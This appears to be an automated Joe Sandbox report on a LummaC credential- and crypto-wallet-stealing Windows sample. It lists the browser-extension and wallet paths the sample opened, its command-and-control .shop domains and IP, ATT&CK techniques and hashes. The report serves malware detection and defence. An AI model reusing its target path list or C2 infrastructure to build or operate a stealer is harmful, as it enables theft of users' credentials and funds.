Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior

Source: Yara match

File source: Process Memory Space: file.exe PID: 4192, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 4192, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	11 Virtualization/Sandbox Evasion	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	31 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	2 Clipboard Data	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Software Packing	LSA Secrets	12 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	45%	ReversingLabs	Win32.Trojan.Generic
file.exe	47%	Virustotal		Browse
file.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
strollheavengwu.shop	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	0%	URL Reputation	safe
https://support.microsof	0%	URL Reputation	safe
http://crt.rootca1.amazontrust.com/rootca1.cer0?	0%	URL Reputation	safe
shortsvelventysjo.shop	1%	Virustotal		Browse
tolerateilusidjukl.shop	1%	Virustotal		Browse
https://strollheavengwu.shop/api	11%	Virustotal		Browse
shatterbreathepsw.shop	1%	Virustotal		Browse
demonstationfukewko.shop	1%	Virustotal		Browse
productivelookewr.shop	1%	Virustotal		Browse
strollheavengwu.shop	1%	Virustotal		Browse
incredibleextedwj.shop	1%	Virustotal		Browse
alcojoldwograpciw.shop	1%	Virustotal		Browse
liabilitynighstjsko.shop	1%	Virustotal		Browse
https://strollheavengwu.shop/	1%	Virustotal		Browse
https://strollheavengwu.shop/#	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
strollheavengwu.shop	104.21.15.198	true	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
shortsvelventysjo.shop	true	1%, Virustotal, Browse	unknown
tolerateilusidjukl.shop	true	1%, Virustotal, Browse	unknown
https://strollheavengwu.shop/api	false	11%, Virustotal, Browse	unknown
shatterbreathepsw.shop	true	1%, Virustotal, Browse	unknown
demonstationfukewko.shop	true	1%, Virustotal, Browse	unknown
productivelookewr.shop	true	1%, Virustotal, Browse	unknown
strollheavengwu.shop	true	1%, Virustotal, Browse	unknown
alcojoldwograpciw.shop	true	1%, Virustotal, Browse	unknown
incredibleextedwj.shop	true	1%, Virustotal, Browse	unknown
liabilitynighstjsko.shop	true	1%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.1665105671.0000000004248000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.1665105671.0000000004248000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	file.exe, 00000000.00000003.1691890634.000000000420B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://strollheavengwu.shop/h	file.exe, 00000000.00000003.1733642264.0000000004208000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1891077246.0000000004208000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.1665105671.0000000004248000.00000004.00000800.00020000.00000000.sdmp	false		high
https://strollheavengwu.shop/n	file.exe, 00000000.00000003.1681704973.0000000004208000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	file.exe, 00000000.00000003.1664641169.000000000425D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://strollheavengwu.shop/m	file.exe, 00000000.00000003.1691890634.000000000420B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1691955412.000000000420F000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://strollheavengwu.shop/s	file.exe, 00000000.00000003.1733642264.0000000004208000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1891077246.0000000004208000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://strollheavengwu.shop/gC	file.exe, 00000000.00000003.1664402054.0000000001ACB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	file.exe, 00000000.00000003.1691890634.000000000420B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://strollheavengwu.shop/C%a	file.exe, 00000000.00000003.1673421528.000000000420F000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://strollheavengwu.shop/c	file.exe, 00000000.00000003.1664402054.0000000001ACB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://x1.c.lencr.org/0	file.exe, 00000000.00000003.1682266354.0000000004223000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	file.exe, 00000000.00000003.1682266354.0000000004223000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://strollheavengwu.shop/a	file.exe, 00000000.00000003.1691955412.000000000420F000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.1665105671.0000000004248000.00000004.00000800.00020000.00000000.sdmp	false		high
https://strollheavengwu.shop/d	file.exe, 00000000.00000003.1673421528.000000000420F000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://strollheavengwu.shop/e	file.exe, 00000000.00000003.1692214751.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1692613094.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1692326978.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1692443580.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1691890634.000000000420B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1691955412.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1692107511.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1692942051.000000000420F000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://strollheavengwu.shop/7%	file.exe, 00000000.00000003.1682044999.000000000420D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1681704973.0000000004208000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1692214751.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1682461997.000000000420D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1691890634.000000000420B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1691955412.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1681988737.0000000004209000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1692107511.000000000420F000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://support.mozilla.org/products/firefoxgro.all	file.exe, 00000000.00000003.1683395578.000000000432C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://strollheavengwu.shop/Q	file.exe, 00000000.00000003.1664402054.0000000001ACB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://strollheavengwu.shop/3&	file.exe, 00000000.00000003.1673421528.000000000420F000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	file.exe, 00000000.00000003.1691890634.000000000420B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://strollheavengwu.shop/9	file.exe, 00000000.00000003.1733642264.0000000004208000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1891077246.0000000004208000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	file.exe, 00000000.00000003.1691890634.000000000420B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.1665105671.0000000004248000.00000004.00000800.00020000.00000000.sdmp	false		high
https://strollheavengwu.shop/C	file.exe, 00000000.00000003.1701771883.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1701569967.000000000420C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1701526477.0000000004209000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.1665105671.0000000004248000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	file.exe, 00000000.00000003.1682266354.0000000004223000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	file.exe, 00000000.00000003.1691890634.000000000420B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://upx.sf.net	Amcache.hve.3.dr	false		high
https://strollheavengwu.shop/:&	file.exe, 00000000.00000003.1673421528.000000000420F000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://ocsp.rootca1.amazontrust.com0:	file.exe, 00000000.00000003.1682266354.0000000004223000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	file.exe, 00000000.00000003.1664641169.000000000425D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.1665105671.0000000004248000.00000004.00000800.00020000.00000000.sdmp	false		high
https://strollheavengwu.shop/%;	file.exe, 00000000.00000003.1664402054.0000000001ACB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	file.exe, 00000000.00000003.1683395578.000000000432C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.1665105671.0000000004248000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000003.1691890634.000000000420B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://strollheavengwu.shop/#	file.exe, 00000000.00000003.1733642264.0000000004208000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1891077246.0000000004208000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1713248842.0000000004205000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://strollheavengwu.shop/apiwxt	file.exe, 00000000.00000002.1890474454.0000000001B28000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://strollheavengwu.shop/%%;	file.exe, 00000000.00000003.1701771883.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1701569967.000000000420C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1701526477.0000000004209000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://support.microsof	file.exe, 00000000.00000003.1664641169.000000000425F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	file.exe, 00000000.00000003.1682266354.0000000004223000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.1665105671.0000000004248000.00000004.00000800.00020000.00000000.sdmp	false		high
https://strollheavengwu.shop/	file.exe, 00000000.00000003.1692107511.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693979502.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1692942051.000000000420F000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.15.198	strollheavengwu.shop	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1429095
Start date and time:	2024-04-20 21:07:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/9@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 94% Number of executed functions: 38 Number of non-executed functions: 109
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.89.179.12
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:07:59	API Interceptor	7x Sleep call for process: file.exe modified
21:08:21	API Interceptor	1x Sleep call for process: WerFault.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.4.15
	file.exe	Get hash	malicious	LummaC	Browse	172.67.177.98
	2M1NS61GG8.exe	Get hash	malicious	LummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, RedLine, zgRAT	Browse	172.67.129.243
	RrHuyQ4GzG.exe	Get hash	malicious	LummaC	Browse	104.21.86.106
	https://track.enterprisetechsol.com/z.z?l=aHR0cHM6Ly9yZXNvdXJjZS5pdGJ1c2luZXNzdG9kYXkuY29tL3doaXRlcGFwZXJzLzQ0ODAzLU1pY3Jvc29mdC1DUEwtUTItUE1HLUFCTS1HZXItMS1sYW5kaW5nLnBocD9lPWJvbnVjY2VsbGkuZGFyaW9AZGVtZS1ncm91cC5jb20=&r=14547470367&d=12037165&p=1&t=h&h=fb97401a549b1167a78f6002a0aef94d	Get hash	malicious	Unknown	Browse	172.67.74.40
	jNeaezBuo8.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	104.21.4.208
	74fa486WVX.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	104.21.76.57
	SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf	Get hash	malicious	Remcos	Browse	172.67.215.45
	Receipt_7814002.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	Essay on Resolution of Korean Forced Labor Claims.vbs	Get hash	malicious	Unknown	Browse	104.26.15.182

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	RisePro Stealer	Browse	104.21.15.198
	pSfqOmM1DG.exe	Get hash	malicious	Remcos, DBatLoader	Browse	104.21.15.198
	file.exe	Get hash	malicious	LummaC	Browse	104.21.15.198
	hta.hta	Get hash	malicious	Unknown	Browse	104.21.15.198
	2M1NS61GG8.exe	Get hash	malicious	LummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, RedLine, zgRAT	Browse	104.21.15.198
	RrHuyQ4GzG.exe	Get hash	malicious	LummaC	Browse	104.21.15.198
	SecuriteInfo.com.Win32.Malware-gen.6467.28521.exe	Get hash	malicious	Unknown	Browse	104.21.15.198
	SecuriteInfo.com.Win32.Malware-gen.6467.28521.exe	Get hash	malicious	Unknown	Browse	104.21.15.198
	FFE Order details - Cincy v41720.xlsx	Get hash	malicious	Unknown	Browse	104.21.15.198
	z47Danfe-Pedido17042024.msi	Get hash	malicious	MicroClip	Browse	104.21.15.198

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_5c35b761e7b2886414fdd9b14cedcc55e7ebf4_79a0e859_e937197c-8d4c-4a9e-9e0b-35ae5b0d1770\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9834677510608091
Encrypted:	false
SSDEEP:	192:eCnI739UvjP7hTb0U7v+I3jldFPzuiFDZ24IO8kVB:1+0jjVoU7vljlzuiFDY4IO8a
MD5:	A4157FBBD1C83E318FC3B01B579FFBDE
SHA1:	820D692373A651340E6F6A70C8ADE407ADF842B1
SHA-256:	EF9395F8C36A834907FA696B5CC124ACD4EC4211264CDE91FA4670816F4FE392
SHA-512:	54101DCB28033977CFF583B7BC864BDAA853A80F517E3F3A6EE0DE968023539914C1C403D5ABDF3438E424D9B5556ADC00B1777B04253C4B67645D51007D9F90
Malicious:	false
Reputation:	low
